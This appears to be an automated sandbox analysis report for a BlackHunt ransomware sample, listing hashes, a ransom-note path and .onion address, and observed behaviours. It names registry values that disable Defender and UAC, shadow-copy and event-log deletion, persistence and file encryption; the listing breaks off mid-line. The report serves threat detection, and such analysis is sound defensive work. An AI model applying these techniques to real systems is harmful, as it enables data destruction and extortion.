Analysis
-
max time kernel
91s -
max time network
125s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
19-01-2024 01:31
Static task
static1
Behavioral task
behavioral1
Sample
fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe
Resource
win10v2004-20231215-en
General
-
Target
fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe
-
Size
707KB
-
MD5
fbc06b5bcefd2a076d42c6897185724d
-
SHA1
0415c2dfb52c254fafcf5d31464d32c1dc3ec2b8
-
SHA256
fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c
-
SHA512
b80ba08f6376c0d5eb4fae093c3a0f8585a4388fc30f60134ec2aa4ee6691b0f0a31d9e09721a88066fc923a569e476f5351b87841536440cc0a528f9d170a9b
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1a8Evnh:6uaTmkZJ+naie5OTamgEoKxLWZ6h
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 6884 fsutil.exe 5808 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 5416 wevtutil.exe 5668 wevtutil.exe 7732 wevtutil.exe 15944 wevtutil.exe 16084 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 9756 bcdedit.exe 10024 bcdedit.exe 6016 bcdedit.exe 7264 bcdedit.exe -
Renames multiple (3348) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 7752 wbadmin.exe 13212 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\O: fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened (read-only) \??\X: fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened (read-only) \??\P: fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened (read-only) \??\A: fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened (read-only) \??\H: fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened (read-only) \??\N: fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened (read-only) \??\R: fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened (read-only) \??\S: fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened (read-only) \??\G: fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened (read-only) \??\L: fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened (read-only) \??\V: fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Q: fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened (read-only) \??\W: fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened (read-only) \??\E: fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened (read-only) \??\I: fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened (read-only) \??\B: fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\T: fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened (read-only) \??\U: fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened (read-only) \??\J: fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened (read-only) \??\Z: fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened (read-only) \??\M: fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened (read-only) \??\Y: fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\K: fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened (read-only) \??\F: fsutil.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\new_icons_retina.png fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\en-il\#BlackHunt_ReadMe.hta fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ja-jp\ui-strings.js fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File created C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\#BlackHunt_ReadMe.hta fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\#BlackHunt_Private.key fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_listview.svg fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\zh-tw\#BlackHunt_Private.key fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\eu-es\ui-strings.js fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File created C:\Program Files\Java\#BlackHunt_ReadMe.txt fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\flavormap.properties fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\relaxngom.md fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\es-es\#BlackHunt_ReadMe.txt fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ru-ru\#BlackHunt_Private.key fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\share_icons2x.png fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\adc_logo.png fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\giflib.md fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\#BlackHunt_Private.key fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ar-ae\#BlackHunt_ReadMe.hta fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nl-nl\ui-strings.js fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-gb\#BlackHunt_Private.key fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\hr-hr\#BlackHunt_ReadMe.hta fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\zh-cn\ui-strings.js fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ru-ru\#BlackHunt_ReadMe.hta fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\jcup.md fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\management\snmp.acl.template fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File created C:\Program Files\VideoLAN\VLC\locale\vi\#BlackHunt_ReadMe.txt fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\da-dk\#BlackHunt_Private.key fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\fr-ma\#BlackHunt_ReadMe.hta fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\pl-pl\#BlackHunt_ReadMe.hta fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\#BlackHunt_Private.key fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fr-fr\#BlackHunt_ReadMe.txt fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\es-es\#BlackHunt_Private.key fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\zh-tw\#BlackHunt_ReadMe.txt fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File created C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\#BlackHunt_ReadMe.txt fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\cef_extensions.pak fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sk-sk\#BlackHunt_ReadMe.hta fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\es-es\#BlackHunt_Private.key fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons__retina_hiContrast_bow.png fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\de-de\#BlackHunt_ReadMe.hta fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\pt-br\#BlackHunt_ReadMe.txt fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\images\themeless\#BlackHunt_ReadMe.txt fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fr-fr\#BlackHunt_ReadMe.hta fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\#BlackHunt_Private.key fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\AdobePDF417.pmp fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File created C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\#BlackHunt_ReadMe.txt fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-tw\#BlackHunt_Private.key fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-ae\ui-strings.js fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\root\#BlackHunt_Private.key fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\pt-br\#BlackHunt_Private.key fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\hr-hr\ui-strings.js fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\SearchEmail.png fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\#BlackHunt_Private.key fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sv-se\ui-strings.js fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sk-sk\#BlackHunt_Private.key fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ca-es\#BlackHunt_Private.key fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-cn\#BlackHunt_Private.key fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File created C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\106.0.5249.119\#BlackHunt_Private.key fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File created C:\Program Files\VideoLAN\VLC\plugins\audio_filter\#BlackHunt_ReadMe.hta fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sl-sl\#BlackHunt_ReadMe.txt fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\css\#BlackHunt_ReadMe.hta fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\cstm_brand_preview2x.png fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\eu-es\ui-strings.js fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\hu-hu\#BlackHunt_Private.key fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\#BlackHunt_ReadMe.txt fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 15848 10416 WerFault.exe 291 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5504 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 9092 vssadmin.exe 3420 vssadmin.exe 6416 vssadmin.exe 5524 vssadmin.exe 5528 vssadmin.exe 8624 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 15484 taskkill.exe -
Modifies registry class 9 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 15392 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe Token: SeRestorePrivilege 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe Token: SeBackupPrivilege 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe Token: SeTakeOwnershipPrivilege 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe Token: SeAuditPrivilege 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe Token: SeSecurityPrivilege 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe Token: SeIncBasePriorityPrivilege 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe Token: SeBackupPrivilege 10196 vssvc.exe Token: SeRestorePrivilege 10196 vssvc.exe Token: SeAuditPrivilege 10196 vssvc.exe Token: SeBackupPrivilege 15244 wbengine.exe Token: SeRestorePrivilege 15244 wbengine.exe Token: SeSecurityPrivilege 15244 wbengine.exe Token: SeSecurityPrivilege 16084 wevtutil.exe Token: SeBackupPrivilege 16084 wevtutil.exe Token: SeSecurityPrivilege 5416 wevtutil.exe Token: SeBackupPrivilege 5416 wevtutil.exe Token: SeSecurityPrivilege 5668 wevtutil.exe Token: SeBackupPrivilege 5668 wevtutil.exe Token: SeSecurityPrivilege 7732 wevtutil.exe Token: SeBackupPrivilege 7732 wevtutil.exe Token: SeSecurityPrivilege 15944 wevtutil.exe Token: SeBackupPrivilege 15944 wevtutil.exe Token: SeDebugPrivilege 15484 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3220 wrote to memory of 3864 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe 89 PID 3220 wrote to memory of 3864 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe 89 PID 3220 wrote to memory of 2096 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe 91 PID 3220 wrote to memory of 2096 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe 91 PID 3220 wrote to memory of 404 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe 177 PID 3220 wrote to memory of 404 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe 177 PID 3220 wrote to memory of 4120 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe 95 PID 3220 wrote to memory of 4120 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe 95 PID 3220 wrote to memory of 5072 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe 97 PID 3220 wrote to memory of 5072 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe 97 PID 3220 wrote to memory of 2768 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe 99 PID 3220 wrote to memory of 2768 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe 99 PID 3864 wrote to memory of 4808 3864 cmd.exe 101 PID 3864 wrote to memory of 4808 3864 cmd.exe 101 PID 3220 wrote to memory of 2148 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe 102 PID 3220 wrote to memory of 2148 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe 102 PID 3220 wrote to memory of 2956 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe 104 PID 3220 wrote to memory of 2956 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe 104 PID 4120 wrote to memory of 3028 4120 cmd.exe 106 PID 4120 wrote to memory of 3028 4120 cmd.exe 106 PID 3220 wrote to memory of 3032 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe 184 PID 3220 wrote to memory of 3032 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe 184 PID 404 wrote to memory of 4464 404 cmd.exe 168 PID 404 wrote to memory of 4464 404 cmd.exe 168 PID 2096 wrote to memory of 836 2096 cmd.exe 110 PID 2096 wrote to memory of 836 2096 cmd.exe 110 PID 3220 wrote to memory of 1436 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe 111 PID 3220 wrote to memory of 1436 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe 111 PID 5072 wrote to memory of 1044 5072 cmd.exe 113 PID 5072 wrote to memory of 1044 5072 cmd.exe 113 PID 2148 wrote to memory of 4708 2148 cmd.exe 114 PID 2148 wrote to memory of 4708 2148 cmd.exe 114 PID 3220 wrote to memory of 1864 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe 115 PID 3220 wrote to memory of 1864 3220 fb4961cc14d1a32436252dbada27f2393bc00811d8513d409c4c450eab98b35c.exe 115 PID 3032 wrote to memory of 3964 3032 Conhost.exe 116 PID 3032 wrote to memory of 3964 3032 Conhost.exe 116 PID 2956 wrote to memory of 1144 2956 cmd.exe 118 PID 2956 wrote to memory of 1144 2956 cmd.exe 118 PID 3220 wrote to memory of 4064 3220 